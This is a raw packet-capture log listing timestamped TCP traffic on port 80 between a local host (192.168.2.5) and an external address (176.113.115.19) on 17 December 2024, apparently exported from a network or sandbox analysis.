Dec 17, 2024 08:18:44.110899925 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.110945940 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.151472092 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.151499033 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.151550055 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.151571035 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.223309040 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.223354101 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.223395109 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.223423004 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.225490093 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.225555897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.225629091 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.225677967 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.229937077 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.230021000 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.231563091 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.231626034 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.231661081 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.231723070 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.236130953 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.236181974 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.236202002 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.236229897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.240585089 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.240643978 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.240669012 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.240710974 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.245088100 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.245141983 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.245354891 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.245413065 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.249696970 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.249710083 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.249752998 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.249769926 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.254024982 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.254075050 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.254149914 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.254194021 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.258522987 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.258574009 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.258622885 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.258667946 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.263025999 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.263087034 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.263123035 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.263175964 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.267554045 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.267606020 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.267649889 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.267688990 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.272047997 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.272119999 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.272159100 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.272201061 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.276549101 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.276607990 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.276652098 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.276695013 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.281136990 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.281208038 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.281275034 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.281316996 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.284950972 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.285012007 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.285090923 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.285137892 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.288573027 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.288592100 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.288623095 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.288646936 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.292205095 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.292262077 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.292341948 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.292382002 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.295965910 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.296020985 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.296031952 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.296066999 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.299621105 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.299685001 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.299689054 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.299726009 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.303374052 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.303386927 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.303487062 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.303487062 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.306900024 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.306951046 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.306979895 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.307020903 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.310539007 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.310600042 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.310687065 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.310745955 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.314188957 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.314244032 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.415386915 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.415456057 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.415524006 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.415574074 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.416910887 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.416964054 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.416990995 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.417026997 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.419770956 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.419831038 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.419863939 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.419908047 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.422913074 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.422926903 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.422976971 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.423204899 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.425606966 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.425683022 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.425698042 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.425734997 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.428750038 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.428761959 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.428946972 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.431519985 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.431534052 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.431597948 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.434442043 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.434453964 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.434493065 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.437597036 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.437612057 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.437659979 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.440502882 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.440515995 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.440556049 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.443110943 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.443140984 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.443162918 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.443183899 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.446094036 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.446109056 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.446151972 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.448940992 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.449006081 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.449300051 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.449368954 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.451742887 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.451803923 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.451865911 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.451913118 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.454976082 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.454988956 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.455032110 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.457802057 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.457813978 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.457860947 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.460064888 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.460117102 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.460180044 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.460223913 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.462795019 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.462863922 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.463094950 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.463165998 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.465476990 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.465540886 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.466284037 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.466336012 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.468655109 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.468672991 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.468707085 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.468719959 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.470803022 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.470877886 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.471364021 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.471436977 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.473467112 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.473522902 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.473592997 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.473642111 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.476326942 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.476342916 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.476411104 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.479017019 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.479032040 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.479132891 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.482084990 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.482099056 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.482170105 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.484277010 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.484323025 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.484420061 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.484455109 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.487135887 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.487148046 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.487189054 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.489600897 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.489645958 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.489681959 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.489716053 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.492299080 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.492311954 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.492399931 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.495304108 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.495322943 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.495368004 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.495392084 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.498117924 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.498140097 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.498178005 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.498193026 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.500689983 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.500704050 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.500739098 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.503288984 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.503303051 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.503336906 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.503351927 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.506072998 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.506086111 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.506136894 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.508632898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.508646011 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.508696079 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.511358976 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.511373997 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.511456966 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.513875961 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.513890028 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.513942957 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.607667923 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.607748032 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.607752085 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.607789993 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.608720064 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.608767986 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.608874083 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.608917952 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.610985041 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.611027002 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.611094952 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.611140013 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.613714933 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.613727093 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.613775969 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.615462065 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.615504980 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.615573883 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.615617037 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.617688894 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.617747068 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.617788076 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.617831945 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.619820118 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.619884968 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.620049953 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.620098114 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.622011900 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.622061014 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.622096062 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.622170925 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.624069929 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.624120951 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.624157906 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.624203920 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.626476049 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.626527071 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.626601934 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.626645088 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.628226995 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.628273010 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.628325939 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.628366947 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.630162001 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.630211115 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.630280972 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.630323887 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.632184982 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.632232904 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.632316113 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.632369041 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.634134054 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.634181976 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.634251118 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.634293079 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.636113882 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.636163950 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.636231899 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.636297941 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.637976885 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.638030052 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.638065100 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.638102055 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.639882088 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.639952898 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.640008926 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.640048027 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.641794920 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.641843081 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.641913891 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.641953945 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.643651009 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.643701077 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.643737078 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.643775940 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.645549059 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.645598888 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.645664930 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.645709038 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.647430897 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.647486925 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.647603989 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.647646904 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.649332047 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.649382114 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.649447918 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.649488926 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.651251078 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.651300907 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.651340008 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.651386023 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.653090000 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.653141975 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.653199911 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.653242111 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.654992104 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.655054092 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.655085087 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.655122042 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.656884909 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.656946898 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.656990051 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.657030106 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.658796072 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.658848047 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.658886909 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.658926010 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.660651922 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.660721064 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.660742998 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.660775900 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.662523031 CET	80	49705	176.113.115.19	192.168.2.5
